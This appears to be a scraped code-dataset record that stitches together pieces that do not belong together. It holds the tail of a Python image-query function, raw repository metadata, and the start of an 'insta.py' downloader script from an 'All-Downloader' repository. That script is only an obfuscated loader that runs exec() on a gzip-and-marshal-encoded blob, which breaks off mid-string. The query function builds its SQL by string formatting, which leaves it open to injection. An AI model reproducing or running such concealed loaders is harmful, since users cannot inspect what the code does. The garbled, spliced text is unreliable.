    # Correctly-labelled images of the matched class, best score first.
    cursor.execute(
        "select path, noisy_label, clean_label, score, size, time from %s where noisy_label=%d and noisy_label = clean_label order by score desc;" % (
            data['dataset'], c))
    for item in cursor.fetchall():
        if size(data['size'], item) and date(data['date'], item):
            clean_images.append({'path': '/imgs' + item[0],
                                 'label': label_of(item[1]),
                                 'size': item[4]})
    clean_num = len(clean_images)
    # Mislabelled images of the matched class, lowest score first.
    cursor.execute(
        "select path, noisy_label, clean_label, score, size, time from %s where noisy_label=%d and noisy_label <> clean_label order by score asc;" % (
            data['dataset'], c))
    for item in cursor.fetchall():
        if size(data['size'], item) and date(data['date'], item):
            noisy_images.append({'path': '/imgs' + item[0],
                                 'noisy_label': label_of(item[1]),
                                 'clean_label': label_of(item[2]),
                                 'size': item[4]})
    noisy_num = len(noisy_images)
    if data['dataset'] == 'ImageNet':
        print(c)  # original debug print — ImageNet branch only
    return clean_images, noisy_images, clean_num, noisy_num
| 41.14011
| 159
| 0.499366
| 1,700
| 14,975
| 4.271176
| 0.075882
| 0.04958
| 0.032227
| 0.060598
| 0.82165
| 0.802369
| 0.773998
| 0.762567
| 0.70376
| 0.682
| 0
| 0.014608
| 0.378297
| 14,975
| 363
| 160
| 41.253444
| 0.765306
| 0
| 0
| 0.813253
| 0
| 0.033133
| 0.179852
| 0.001642
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021084
| false
| 0.012048
| 0.021084
| 0
| 0.123494
| 0.012048
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5e84b862ff29eb4b12747dab6596bf3ae10465f9
| 173,695
|
py
|
Python
|
bin/temp/var/usd/cd/tmp/usd/data/data/data/data/data/temp/insta.py
|
RazorKenway/All-Downloader
|
e1c6d9ee277166faff8876e967b521fd752f0e7f
|
[
"MIT"
] | 44
|
2021-06-28T15:57:18.000Z
|
2022-03-22T07:36:13.000Z
|
bin/temp/var/usd/cd/tmp/usd/data/data/data/data/data/temp/insta.py
|
RazorKenway/All-Downloader
|
e1c6d9ee277166faff8876e967b521fd752f0e7f
|
[
"MIT"
] | 1
|
2021-11-26T13:28:10.000Z
|
2022-01-10T21:23:41.000Z
|
bin/temp/var/usd/cd/tmp/usd/data/data/data/data/data/temp/insta.py
|
RazorKenway/All-Downloader
|
e1c6d9ee277166faff8876e967b521fd752f0e7f
|
[
"MIT"
] | 5
|
2021-08-23T17:34:56.000Z
|
2022-02-25T19:23:59.000Z
|
#ENCODE BY CRYPTO
#YOU CAN TRY THIS DECODE GOD BLESS
import gzip,marshal,zlib,base64,binascii,lzma
try:
exec(gzip.decompress(marshal.loads(b's\xc4\xeb\x00\x00\x1f\x8b\x08\x00\x00\x86\x98a\x02\xff\\]YC\x14M\x90|\xdf_\x81\x88\xa8\xa0\xd0\xf7\xa1"\xa0 \xa2\x82\x8a"\xa8\xa8tuu\x0b\xa2\xdc\xca!\xfa\xdbw"2\xca\xf9v\x1f<\x80a\xa6\xbb\xba*\x8f\xc8\xc8\xc8\xdd\x1f\x87\x07\xc7\xa7#\xae9\xe9\x8a\xec\xce\x8f\xe6\xf8d\xa7\xf9~\xc7\xed\xee7\'\xed\xee\xee\x9d\xaf\x97\xbb\x87w.\xbf\xef\xba\xff9=\xbe\xb8\xd7\x9dw\xed-\xbdf\xea\xfbA\xe3On\xe1\x05S\xbek\x0f~\x1c\x1ew\'\'\xb7\xdc\xcd\xad\xf3\xb8\xdf:\xaf\xdc\xd6yT\r\xfeD\xf6\xa7*\xb6\xce\xeb\xaa\x19|\x91l\x9d\xf7\x83\x17\xb4\xed\xd6\xb9+\xb7\xce}z25\xf8n7\xf8\n/\xcd\x06\xbf>\xf85?\xf8uW\xfc\xd8:\xef\x06\xffi\x07\xdfl\x07\xbf_\xd5\x83\xaf\xfd\xe0Of\xdf\xeb\xf1!\xff^\xf9\xff\xfe3\xf8\xb8\xc1K\xfb\xc1\x1f\xef\x7f\x7f\xb1\xef\xf4\xc5\xf4\xe0\xcb\xc1\xdb7\x83w\xaa\x07\x17\xd3u\xe1\xff\x7f\x07_\x0c~P\x97\xf6\x8d\xae\x89u\xa9\x8d]n\x9c\xd9%\x97\xfd]|\xf0\x97\xfb\x97\x83\x7f\x06_G%\xaem\xce.\xb0\x1d\xdc\x81/\xe6>\xe8\x0e\xf1\xa3\xe8\x83}\x9b\xdfp#\x1fF\xc2\x7f\x07\x9f\x83\x9f5\xff~\xb6\xfda{\xf01\x83\x0b\xea\xa3\xf1\xc1\x05\xe0\xaf6\xba\x18|\x0b\xffk\xf0\xbf:\xc2\xc7\xe0\x1dj\xbd\xa9\xfe\xadb\xfb\xb7\x8d\xe6p\xe9x\xc7\xc1:\xd4\xf9\xf0\'U\xf4\xc2>\xcb\xb7\x17\xf6]\xfcq\x99}\xd3\xbe~\x80\xcfZ\x19\\D\xd5\xce\xaf\xe0\x07\xa9~2\xb8\xcd\x16\xafN\xe6\xf1\xce/\x07?J\xed\xb3\xeb\xfe\xd9`\x05\xdc\xe06bgKU\xf6\xf6\xae}?\xb8yW\xdb\x1a:\xec\x85\xe4\xf5\xe0\x9dR\xfc\x8e\xddp\x85E\xc5+\xb0LU\xfaadp_m\xf2\xf4\xd6\x88]R\x1de\x8f\xf1\xf7\x97\xc1\xd7ql\x17\xd0t\x9f\xf5\xd9\xf8\x94\xfe\xf7\xe0?x~\x9d]L\x89o\xf8\xe2\xe8\x1d\x9eu\x8b[\x1e\xfc\xcc\xd9\x15DQ\xf1\x11\x7f\x0f~\xbf\xf5\xfa\xfc\xc1\xfb\xf8\x06\xbb\xa4\xccm\x8bz\xdc\xe7\xe0\xcdb=\xc9\xa6\xb0W7\xd8r\x83\xdfh\xda\xdf\xb8\xe4\xc9\xaf\x83\xff\xe2\xae\xe2\xad\xd3\xc1\x0b\x06\xbf\xdc\x0c\xfetq\xf6~\xb0%\xe2\xc1;\xfa\x08;{\xda\xf6h\x93>\xb4\xefD\xfd\x9d\xc1\xab\n\xec\xe0\x03\\\xd4\xcf\xc1\x8b[\xfc\xe5\xff\xe8\xa3\xdd\xf42\xbe\xb4\x15\xf1~\xfa\xb5\x1d\x05~U\xf1+\xad\x96\xaf\xf9U\xb3\x84\xbf\x06W\x13\x97\xbf\xec\t`\
x8f\xc7\xfe\x10\xcf\x11_\xd4\x87\xb6v.\x1f\xe3\xe5\xf2\xcd\xc3\xbf\xd8\xd0q\xfa\xc6>\xbb\xc2\x99\xe8\xa7\xee\xd9\xeb\xe3\x14\xffN\x0e\xfe\xca\xafc\xa1\x07\x97\x1b\xeb)h\x99\xb0\xb6m5X\xe9\x1a\xef\x92?\x7fo;\xa5\xcf\xed\x90\xd4\xcdS<\xfd\xd5\xafv\xc2\xfa\xd2N]\xdf\xfe>\xbd\xe6m\xcd\xf0\x08\x9a\xf2\xcc\x0e8\xec\x00\x8e\xa3/m_\xb4\xf8!W\xdcvT_\xd8k\xf8d\xca\x19\xdc\x91]S\x85_\xa8vdb\x06\xefT5\xb7\xecau\xdd\xf4.\xaeu\xbf^J\xb0\x8e\x83\r]c3\x94\x83\xed[ux\xf4\xf8O}\x80\xf7z\xae\x07\xd3\x7f\xb7\xc3\xcf\x9d\x93n\xdd\xb4{\xc51\x8a\xebw\xb6\x8d\xabt\xe2\xfe\xe0\xdby\xba65\xf8\x90:~g\xafiJ\xfcz\x82\xbb8\xb0\xfd\x1b\xf5\xe7\xbf\xcd\x9c\xe0\x86psulk\xf9\xef\xdf\xc1\xfbzld\x18\xc5\xde\xf6j\xf8\xda\xf5\xb8z\x1a\x8f\x8ao\xb6\xac\xaf\xec\xadqg\xf8\xcaG\x83]\xed3{6\xb0\x0eU\xba}g\xc7\xf6v\x89\xfd\xd6\x0cV\xddy\xdb\x0fu\xba\x8d\xdd>\x82-\xb0\xfd\xc5\x0eb\xd5\xce\x8d\x7f\xb4\xff\xba~\xfb\x9e\xbd\x89\xc3\x03\xce\xec\xe0\xd4\t^tm\xf0\x0e\x83\xff\xf8\xe4;^\x97\xdb\xfbUe\xbdd\xb6>\xd6\xa1\x81m\xc6\x95\xf8\xec\xbdn\xa7\xb5%\x88\x927\xa7\xf6\xc0<^\x86\x8b\xade\xda\xf1\xa8`&\x9c\xdd\x087Zk\xae\x03\xa7\xa6\xce\xcb\xc6\xf6k\xef\x9enc\x0bT\x9b\xd8\xa07\x06/\xc9\xed|\xe0O\xdd\xbc3\xdf\xd1\xb5\xf8\xe9\x03\xfb\xe8\x1eG\xdc/\xd9;\xd1 
\x15{\xb0\xac\xb6\xa1\xf8\r\xff\xb5K\xf3=\xf3?\xfd\xe0\x1a\xea\xc2\xae\xab\xc3\x85bw\xe1\x82\xb8\x05\x9b\xad}.\xc7>\xce\xdbk\xbb\xf2*\x1e|\xe5R\xbb\xc9\x1e\x0f\xa3\xee\xb6\x8e\xcd\x04w\xdd\x06\x8e\xc6\xf1\xc1\xc7\xe2\xc8\\EW\xee\xda\x05\xc2\xf8\xb7\xee\x95\x16+]Z\xb9g\xf6\xad.>\xdb\xfbF|y\xbd\xfb\x1f\xbf\x88\xd3\x05\x13\x98\xd9&\x19\x9c\xbb\xfd70\x98x\xdbE\xac\x7f\xf6\xda\xcc\x92/\xef\xe0\x8d\xbf\xd9\xeb\xda\xb2\xb3\x05u\xfc\xc5R\xc6\xb8\xd8\x81\xc1xk\x1b\xaf\xca\xee\xc0\xa5\x99\xbd\n~\x1bF?\x1c;\xf8\xdb\xda\x8f\xday\x8c\x06\xdf\x8cZ[~\xbc\xa8\xee\xbf\xc83a\x95\xf2e\xf3\xbb\xdc;\x11\x9e\xf5\xef\xec\xa1\xbd\x90&\x0f\xe6+v\xb7\xf4y\xf5\xda\xe0=\xe3\x11\x1dM\xb8\xc4\xf4\xd3\xa4|m\x81\xaf~\xe21\xed\xda\x8d\xe1\x88\xd3<g\xf2\xdb\xbe\x9f\xb2\xebs\xf9`\x01q\xfa\x1c\x03\x8f\xe9[v\x0bu\xfe\xc9v?\x9eN\x9c\x9b\xa7\xe8h\xc5^l\xdb\x1e\xc6U\xf4\xdd>\x0f\x9cV3\x95\x95sv\xff\xf8=\xbcu\xd7N\xc2\xf0\xc2\xb5\xd7\xf7\xcc\xca\xb5\r\x0f\xf7\xfed\xa6\xc7\xd6\xc0\xf3\xd2 \xe3\xc3\xdc\x0c^\x92\xc1B\x14\xbf\x97u\xb4\xb0\xa3\xcak\xd8\'\xce\x8e]\xdb=5\xafQ\xc16;\xb9\x1a_Ma\x1f\xff\xc15\xf7\xb6\x01}\xac\x9d]\xe3n\xb9\x98=\xae3\x7f\xb6\x0b\xb3g\xbb\xcau\xb2^\xb8\xb7\xcc6>,\x1a\xee\x1c^*\xf6_\xabk\x16H\xc1d\xc5\xe5\xe0\xa1\xd6-m\xce\x96\xbeU\xc1\xee\xe1N\xf0^\xae\xae\xec\xe1\xe0(t\xf58V\xed\xea\x95Y\xf0\xda=\xfe\x88\xe3\x17\xfd\xfe\x1c\xd9f\xebJ\xdb\x1emj\x9b\xd6Ug\xf0\x1f\xedu\xfc\xf8\xa5\xad/\xcf\xd4\xe0\x90,\xd8\xe2W\xf5\r\x1c\xfc\xbdM\xbc\x1a\xd7\xf1ye\xc5\xce\x8f\xaf\xcd\xf3\xfa\xdc\xcc\x18v\x7f\x1c\xacS:\x87\r\xb8a\xf6\xa9\xc7\xfet\xbd]?\xf7x\xa5\xab\xc6\xba\xc5\xfd\xe1\xd8-\xbb\xa6\xaa\x82I\x8c\xafU{\xfa:\xb2\x18\x05\xc6\x7f\xb0\xf27\x11\xa5\x1e\x9ba\xb0-\xf3\xd1\xac4\xef\xb66\xcb\xdc\x96Wf\xe8\xa2d"1c\x8e\xad\x02\x13\xd8\xe5\xab\xde\x0ce\x9c\x8d\xdbN\xab\xbc\xff6a\xef\x88h\n\x11\xa6++\xf9[\xacZg\x16\xa1rOp\x97\xdb\xf6\xf4\xa3\xec\x0b\xce\xda\x14\x96|\xb0v]"\xbb\x04#\xd3\x9e,h\x7fq\x87\xff\xd1V\xeceB\xdb\x1d;\x1c\xad{1\x8f\xc7~\x82\x9f-]\xb33<x\xa3S\xbb\xa3:\xbb\xd8\xda\xfa\xae#Zo\xc3\xb4\
xdb\xd5\r6\x8d\xdc\x9e\xc3\xee\xea\x06\x87\xee\xe6\xdfq\xc5\xa5\xfd\x08\x8e\xfe\xec0\xb2\x84\x8dw\x83xcK\xde\xa4\xfb#\xb3\x9a\xca\xc4\xf6\xb6\xb8U\xff\xb42\xaf\x84\x9f6\xd9\x133\x10<\xe7\xd8\xda\xcd\x01"\x9b\xca\xbc\t#\xfd\xc4"\x868_\x9f\xc1\x02\xef\xda\xa5b\xb5\xab\xb4\xd4\x9a\xe1\xac\xf8\xfb\x97X\xb4\xf8-\x16d\x151*\xb6\xd9\xd8\xdb\xe7\xce\xae\xb2\xcfo\xdb7\xa3\xbc}iv\xa4\xf3O\xf0\xd1\xfe\xa5m}|T\xdb\xbd\xfc\x8b\xd3\xb7\xbew\x0fW\xf3\x15w\xf5\x04\xbeCo\xe2\xfe\xda\xa5\xf1\xbe\x8baX\xe6\xbae\xbb\x8b\xba\xf9b\xcf\x88\xe1\xa0\xb3\xb5\xc4\x05\xc2s\xf9.\xb7\xad\xd8\xb9\xec\xca\x025\xdckD\x0b3ik\x8f?\xff\xf6\x1d~\x98M\x99\xd3\x80_\xa5\x9d\x90e\xc0\xb9\xaa\xda\xfc\xdd\xa9\xbd\x1e\x1b\t\'\x04+\x03\xe3X\xd5\xebf\xc3\xb0\xbbZ\xf7\x19\xd1s\xbfm\xee%J\xe0@q~`\xf5\xb1\xa1\xe3\xfa\xe9\x9c\xc5pM\xfa\xcb\x8e[\xe5/\x12\x8b\xaf`O\xe2\xe8\xc6\x0c\x8eZ\xb2\x83\xf8\x01Wsa\x1b\x1b\x01w\xc4=\xff\xa44\x8f\tK\xe1\xdcK\x85a\x0c:\xe0\x19z\x04\\8\xb7\xd8\xa6\xb8\xb0.Z1\x9b\xd4\x178%\x08\xf3Z\xac\\_\xbf\x7f:v{\xf7.\x16h\x06\x97\xd5D#\x8b8\xe0\xef\xf4\xa2\x86\x07p\xff\xf5\xbbu\x1cb\x85\xe7\xf1=|z\xb2B\x1b\x8am\x98\x9f\xe1\xb1\xe6?\xf0\xaev\x89\xdem\xd8\x16h\xb0\x86\xb0\xed\x08\x81\xe1 
\xb0E\x9bv\x1a\xcb\x08\xdb\x18\xfb{\xce"\x1fZ\xbc\xda\x8eg\xe3\x95\xd6x\x9a\xfb\xd7H\xac\xdc\x0b\\o\xfc\xe0x\x03\x9f\xd9\xc3Q\xbbv\xd4V\x12f\x0c\x1e\x10{\xcb\x17\xb7\xcc\xabb\x1btQ&{\x83\x1f\xc3b\xf7\x8c\x9b\x9e~0k\x84#\xd6fX\xc5\xf4:V\x7f\x16\x17w\xd7B&\x97}\xf8e\xfb\xb1\xd7\xf6\xeb\xeaK\xa5?\x95\xe2\r\xec\xa2\xf6\x96\xec>S\xb7\xebCw\xde\xc7{8Q\x1b\xa7X\xaeI;\x088\xc1\xb8\xa9\xd8\xc1O\xc2\xbf\xb5\x8a0:\x85\xa3\xd8\x10p\x05\x83\xa8\x86\x9b\xb0nv\x11\x88\xba_\xb0\x03\xdf\xec\x88\xc2M4\x88za\x94pg>\xed\xce\x94\x04\x15\'\xf6~u\xb9\xf0\x157\xe9t\xdcpAH=\x06\xf9\xea\x82\x8eXV\x0f\x02\xa7\x9b\xbbvj\xf8\x99\xe1\x06{\xaej\xb6v\xf2z\xdavm\xd3\xdc\x83i\xdb6\x9b\x10\xe7\xaf\xec6\x98n\x17\x16\xed\xb4\xf5(\xee\xe6\x8d"m^\xe2\r\x98\r\xd9\x00\x9f}\xc3C}k[f\xf3\xa5\xad\x1a#q\xe4\xf2}?/K\\\xfd\xba\xb0\x05t\xf5w[\xf8\xbe\xbd5m\xb9\xae\xc3QB:\xea\x12\xec\x15?y`\'\x81\x99Pb\xf6\xae\xca\xce\x7fe\xde\x1eHW\xfe\xb4{\xa7\xd3\xc2[\x95k\xb6M\x07\xa1#b\x02\x86p\xb0\x0e~]\x89\x98\x1e%\xc3\xdcvL\xff\xc1>l\xfe\xec\xe3 \xbe\xb7\x00\x87\xb9R\xf41\xb3\xb7\xc6\r\xd2x\xc7\xe6\x96\xb9\xb1Z\xb3\x13\xd8\x88U\xbb&/Q\xc7\xd3W\x16&\xb7\x0c{\xe2\x19d\xff\xf1\xeb\xd4\xd6\r\xdb\x1f\xfb\xadV\xf4\x000\x05\xff\xe2(\xfa\xee\xf1\xaa\xd9\x04\xdc\xea\xe0!\x1f#\x8d\xed\x97\x17\xec\x04\xf5\xe6n\x98\xb2\xe2\n\x83W`\x88U\xd8\xce\xe2\x8d83s\x83\xc3|\xac4\xa9\xb5\x7f]\xf9\x1ba\xefx\xa5\xc8\xa5~\xc4 
\xf6\x14\xb62V\x90\x9e[\x98\x00c\x84\x1b\x8b\x08\xf10\xecZ\xb6\x90\xb9\xf6\xf3\xf2\x9bq\x8a\x18h\xb0+\xb7\xec\xd6]t~h\x8f\xb1n?\xe2\xa6\x1f\xe2\xadqYm{y\x0e3\x7f\xa1\xf8#\xdb\xb0`\xb7Nv6N\x7f\xe8\xa0\xe5f\xbf\xe3\x02\'\xa6\xff\xa9}POlr\x17\x9d\x9a\x95\xc7\x06\x88\x9b\xa7O\xedq\xb4\xe97\xa1&\x91\x126\\\x10\xc21\x9e\x1a\xfcI\x8e-\x0bA\xac\x874\x85`Wg_\xbbNV>\xb5\x8c\t\x0f\x011\x11n\x81\xa99rD\x8fKA\x16M\x17\xc0\xc7\xc6Udn\xfd\r\x8b\xba\xb2u\x0c\x87\t3\xe9\xdd\x9f];\x90\xf8\x0cdO\xcc0\xd2\x10\xfd\xd3\xc1\xd7?\xe1\xccf\xf4\x04c\xdb]p\r\x0c\xc1#s\x15N\xc9C\xc7\x17\xe0\x89\xb8s]uk\xcf\xbd\xe9>m\x9a\x97\x8b\xd3q;\xafM\xf7\xe2\xada\rmT\xdb+;\xaek\xf9\x11\x07\xff\x07\xb6\xff:\x96\xd2\xb5\xaf,|\xaa\xfaov\x80\x9ajv\x1b\x0f\xe5=\x1e|\xf5\xd7\x16\x80\x10N\xf7\xd3\xf6X\x93\xee)\xa2\x80i\x84\x97\xc4\xa5a\x03\xb7\xfe\x8d\xd9s\xd8\xfc\xae\x9eYz\xb2\xbe\x86\x98\xc7)\xc2\xaa\x95o\xf2z\xea\xf5\xa7fsh\xcd\xa3\xf0L\xb5\'\xe9\x11\xb4\x04u\x91\xd9c\xae\xcbg\x026{\xbb..X\xff\xf4\xab\x99\xc2\xb8?\xd7\xbb\xe5\xa7\xb6\xfd\xbb\xe4\xc7\xa4\x19\x8d\xae>\xd2iuW\x8a\xe1\xf1``]\x9a\xfce\x87\xd4\x93[<}lG\x1e\xe6\x01)\xd9`\xcbl=\xb1\xd8#r\x0f.\xa7\x95\x89\x94\x96RW\xdd\x9e\\M\xabKH\xc7\x04\x81\xb5v\xce\xbbf\x19i\xa2\xcf>\xaf\xc9\x8c\xe3\xb2\xdcc\x86A0\xf39^X\xdd\x87M\xbcZ\xfa\xf3\x08\xff\xbe\xc0\x8e\\\xa4\x87\xdd\x1f9\xdc\x9d1C\x86\xe0\x88\x06-\x99\x96!&\xfc\x8b\xa3K\x97\x1c\x1f\n\x15\xec\xed\x0f\x8e>\xf7\x1a3\xb3g\x82\\\x05\xa9\xb5\xe5s,\xfe\xd7O\x88^\xef\xda\xfd1\x0b\xf2\xd7\xe0\xd1\x918\xf5p\x05\xc8h\x19\xce\xf7v\xf585mb\x87\xd6E\x97\x8ak\xfa\x14\xd9b\xb6\x83\x85\xa9\xec\xcd\xf0\x98i\x15\x9c=\xee\xb6\xbbe/\x8e\x8a\x0f\xb8\xce\xdd\xad\xd3Y\x98\xab\xebv\x9c\t\x81(]\x88C@\x80l\x18G5\xae\xee*d\xed,~\xe67\xe2\xea 
:\xff\x83h\x1eq\xa8\xe5\xd4\x1f=#\xa2=\x1c\xbd\x07\xe6\x80\x14a\xe1\r\x99\xc6\xe6\x13\xb6q\xe3\xe2\xd2\x0e8S\xf9\xce\x8e\x12\xcdg\xf1\x06\xf7wf\x91P\x9d\xd5\x1f\xb5\xd7tn\xabr\x9b\x16b_\xb0\x106.\xa0q$\xee\x84j\xb1\x83\xb9\x85\x0b\x18\xc7r\xd1V+RpQk\x05\xdb\xe8H\xa6<\xbb\x8d+\xa5\x05\x0f\x06\x19[3\xc6\x11\xae\xda\x9d\xc3\xb7\xe6b\x9a\xfa\x87B\'\x86t\x85\x99\x05s\xf0~\xce\x0e\x17\xed\xa6\xdcAd)\xc7`9\x9f\xdd\xb2K%\x84X\n\xdfWv\xd4\xd1\xe9\xaf+\xaf+n\x7fB\x1e\xd2\xff\xc2\xaf\xae\xe3\xb0\xfc\xc1\xc3:\xb2\r\x17\x13\x80q\xc9\r\xf9\xc1\x1a\xaf#|\xd0\xf1\xde\x8eo\x1bf_E_#[d\x1c\x89\x8a\x99\x11\xd3\xaa\xf4\xa3=e\xd8\xdb>\xfe\xf6\xc0V\xcf\xb3\x06\xd0\xd8\x12y\xba\xdbk\x97\xd8vWSf:\x1a\x98!\x02(\xe5\x82\xc5\xa6\x08d\xf0I\xc4O\xf3\xef\xc70\x7f\xeb\xb6s"\x1e^\xba\xdd\x91\xd7v\x7fU\xfb\x04;\xf7\xadE\xfaUsv$\x84\xcb\xff\x94q\x00\x18b\xe7\xd9\x82m\x8b p\xeb\x82\xc7[\xf9\x16,w\x13\x8f\x99\xcdl\xdc\x82\x99\xba\xa6?\xb2X\x92\x81-bJ\xac\x0c\xd3\xf5\xc6\x1e\x97\xd3\xfe\xae\xbaYg6\n\xf60\xce\x8eT3)\x97\xa7\xde?\xb4{\x8a\x8bq\xfb\x9d\x86\xe6uN\xcf\xcc\x0b\xa0\x84\xebbE\xa5N\xef\xde\x1d\x1eH>\x90\x0e 
k7\xfeH\xb8\xba\xd2k\xc7\x05{k\xfb\x19X\x95\x13\x0e\xc3,\xa4|l\xe1\x18^\xd9\xf6\x80\xcf\xb3\x03Z\xd9RIdg\x8f\xb1\x07$\x100\xdb:\xfe\xfeY\xb1&\xcbD\xd1\xe6_[y\x07H\x9e\x96\xaa\xbaP\x1d\n\'\xa1\xbb\'\xf3H\xd0\xf9\x86mR\x9e\xf7Z\x88W;\x8c\xa5p5\x83\xfbG\xf4\x9f\xcc\xaeY\xe0\xe9\xea\rs\xbc\xcc\xee\x8b\xcd\xe9\x97\x16\x0b\xe1\x81\xe1\xf7\xea\xe0\xb1\x11\x1bb\x87\xc0\xa0\xe0\x8c\xe0\x14\xb0\xf8\x94\xbf\x10V\xd9\xb9\xa5\x0b{\xa0X\x0f\x9cX8\xf5&\xfa\x81\x15\x07\xbc\x95\xbc[S\xe8M\x14\xeb\xdeS\xa5\x99\xcc\xc9\xe2\x05{=\ri\xf5\xea\xbd\xed\xc7\x1e\xde\x8f\xb1Pyu\xb6f\xb7\xd5\x0bT\xefJ[\x04$\x13\xbeS\x9cY\xd8\xa5\x13\x97\xe1\xe1N\x94\x08\xc1|\x16\x9d\xed"\xba\xd4\x94\xa0\'\xf1;\x86q\xcc\xdc\xbf\xdb\xc9!h\x12\x99\xcdp\xc8B\x06\xeb\xbbo\xdf\xe6\xc5\x0c,\xcb\xe0\x90\x7fQT\x96]\xb3x\x14\xe6\xd8\xfbs\xf3\xafU\x16`-\\^\xc3\xf2X\xa7\xfc\xc5omm\x06\xc3\xb4W\xd8:v\xf9c\xdb\xf3\xb4\xce(OE\xfd\xa9y5\xc4\xc7\x9e\xc9\xa3\xd7\xf9\xe8m\x7f\xe0.\xbb\x04O\xa6\xb8\xa7\x1d\x888\xa8\x9c\x13\x92\xe1&\xf0\x9d%\\\xcc m\xb0\xf0\xd8\xdb\x155\x82Wq\x06}\xb9DLn\xcc"y\xac\x0e\x8dV\xa4B\x87 \x818~\xb0\xde}\x85%y\xad\x03\x80\x87\xc7\xd2X\xba\xfa\x19.\xed\xe4\x9a\x00\xc8\xb6\xb2\x90sp\x80n\n]b\n\x89\xad\xd2\x00\xc6-\xba\xe7\x0bpr\xd8j\xb1@\xafVP{TN~\xb1\x03>\xd8\x07\x8b\xed\x9b\xec\x11\x9e\xe9k\x8b\xfa\xb0\xa2\xf8X\xf8O\xec\xf3:CD\\\x9e\x9e\xf3\t*N\x1e\x9c\x88-\x95Eq\x1c\xe2\xa9\x07\xca]\xeb_\x163r\x11\xf3\xbbG\xf9\x1cn\x07hK\xd7\xde\xed\xae\xefD\xb60\xd8\xc3q\xfb\xe3\'\x8eE\toZ\x9fa+>\xc5\x1e>\xc1\x1d\xbe\xd6\x85\xe0<8\xb8y&&\xb5\xedY\xc6\xf0\xdd\xec[ 
\xae\xdd\x1b\xec*\x95A\xbb\xf4\x85E\x12\xbdJ\x8a\x04(iZ\x0bA+\x84/\x9e\x16\x9ffT\xc5dM\x10\xc7\x031;mf{\x82\xbbo~\x98u\xf2\xdd\x04\xb6\xf2\x01~\xf5\x11\xb6(\x82\xd1\xaa\xb1g\xcdu\xef>a\x87\xaf\x9b\xa5\xe4vm/\xb0\xaf\xfa\xf9\xf9\xb1S\x9doz\xdbk\x16\xbe#\'\xe8\x12\x94p\x99\xd6W\x01\x90\xdc\x14\xb4\xe4\xbf\xa9d\xc7:2\xd7\x05\xd0T{_\x89U#\xbb\x8e\x07\x9a\xbc\x00NL{_\x99i\xea\xeb\x17\x04Z\x98+\xbf\x1e\x9f\x1f\xda^\xd6\xb7*\x9cD\xe2\xc2\x88\x9a\x07\x97\xb3%\x7f\x14\xab\x86\x87\x87\xd7\xc4\xfb\x1b\xf2\x87\xf1\x89\x1d#\x97\xbcbX\xb9\xa8b\x83S\xc9\xb4\xbe<|\xf7\xcc\x1ew\x1f_\x8d\n\xf4\xa9\x1f\xe0\xf4~\x7f\x89O\xad\xb7\xf9\x91\x91\x9cA\x1f\x80\xf47fv[\xa1\xb4=\xea\xad\xac\xf5\xb8E\xbb\xc28\x05\x14\x89\xc2N\x9f1(\xc4\xa58f\xe5L\x15\xff\xd8\xa3\x1eX\x93-\xbc\xef\xc3\xb3\x9d\xd1\x99\xf7\xf6Iu,\xdf\x85M\x83\x1a7\xeb\xccM\xf44\x9c\xeaE\x83\xcc`\x96\x11\x94W\xac?d0R\xf5\xe7\xad-l\x9a\xe2\x13\xee\xfe\x9d]m\xec>+\x81/\xed\xf4"\x06!:\xc4x&\xde\xc13\xfc$<\xa9V%\xba\x12\xa2\xe6VQ\x11M\xc6\xae[\xd6\xceL-\xeap\xa5\xcd\xd8\xa4\xde\xae\xb1\xf3\xc6\x90\x06\xeb\x9c\xbf\x15\xb4\r\x83\xe4\xf4\n\x9c\xf9\xb6\xc1c\x03T\xea\x93\xdb\xe3\x82t\xdc\x85*#\xdd\xae\n\x89~\xdc\xce\x0e"\xe9\x81\x8b\x93c\x8bU\x0e\xe0\xb6\xdbL\xbf\x8c*\xf3L\xae\x995\xc0\xc3q\xed\x8fk\xb6W\xaah\xdb\xb0\xabN\xee\x0f\xd7\xc1\xf0<\xb3\xa8:"P\xf6\x10\x9f\xbd\xf8\xc0\x12Wn\xf4\xc8\x02v\xc4\xd0\x95P2B\x16\xb1\x1c\x9f\x80\xc9.\x9d\xba:\xb7\x80\x05\xce\x05\x1f\x1eW\x1b8\xbb\xef-\x1er=Bl\xa2]\r\x1f\xe4\r\x91H\x92\t\xd9\xe0\xb8\xbe\xc2\x01c\x9dD9C\x1d\xc0\x11\x1c\xf4X\xd0\x12\xf7\x82\xbb\xa3\xf0\xb4\xb0\xeb\xea\xd2\x83}\x8b\xeeX\xd9F\x84G\x9c\xb5X\x9e\xc1\x9a\x04<\xd9\xed)Do\xf3/\xbf\xcc\xcc2\x85i\xee\xff&nN\xb0\xa0XP\x9a\x97\xcb"\xa6\xb0\x7f\xfe\x86p\x81\xe6\x0e\xdc\xf9m]>*\xae\x8d\n\xdemy\xbfV\xe14\xde\x8f\xb4+\xab\x97v&\x06?\xc4[\xfd6\x1b\x86]\xef\xeb}\x9e\xa6^\x88Xj\x17_\x13\xc0\xa8YM/\x9f^1\xf2`\xb1=\'\xf5d\xf5\xe5\xee\xb6\xb9\xda&\x05~\xd1m\xe2\xe5\x83\r\x7fb+\xebJ\x01r\xb9]\x98c}\xe8\x17\\\xf1[Oc\r\xd7\x0c\x93B\xb0H\xc6\xa7vs\xc7
\xe0x\xb4+\xc5\x95\x8a\x96\x8d2\x8fX+\\\xde\xd2uvf\xbb\xa2\xf4\xee\xc7W\x88\x02\xef\xbd~\x837@%\xb6\xc0Qo7\xcdf\xb3\xa6Z\x977&\xb0\x8c\xf3B\xd1\x93\x11\xdb\x90}\xff\n\xcf\xfd-\x9c\x94\x0b4\x94\x16\x8f\xd5W\xcf\x16G\xf1\r\x18?:\x01\x9f\xc7\x16\x9a\xe1\x17\xb1\xb7c\xa5\x81-\xca\xf9}\xbe\xa2\xc3\xea:\xac\xb5\xff\xf1s\xe1\xbbJ\x94\x91P\xf9\xf6\xf6\xd6\xf1\xb2YA\xf3\x9d?-\xa2$\x1eO\x83T\xcf\xd9\xee\xe2\xadW\xcf\x9e\xe2\xc6^\xa8\xf0\x93\x05\xbe\x81\xddWT\xed\x9aU\xa8;a\x08\xb9\x0exj[*R\xb9\xb8mP\xbe"\xfe\xdf\x7fU\x96\xc0\xac\xec\xb5\x82\xaa\xe4\xd1f\xf5>\x03\x16R\xbd\x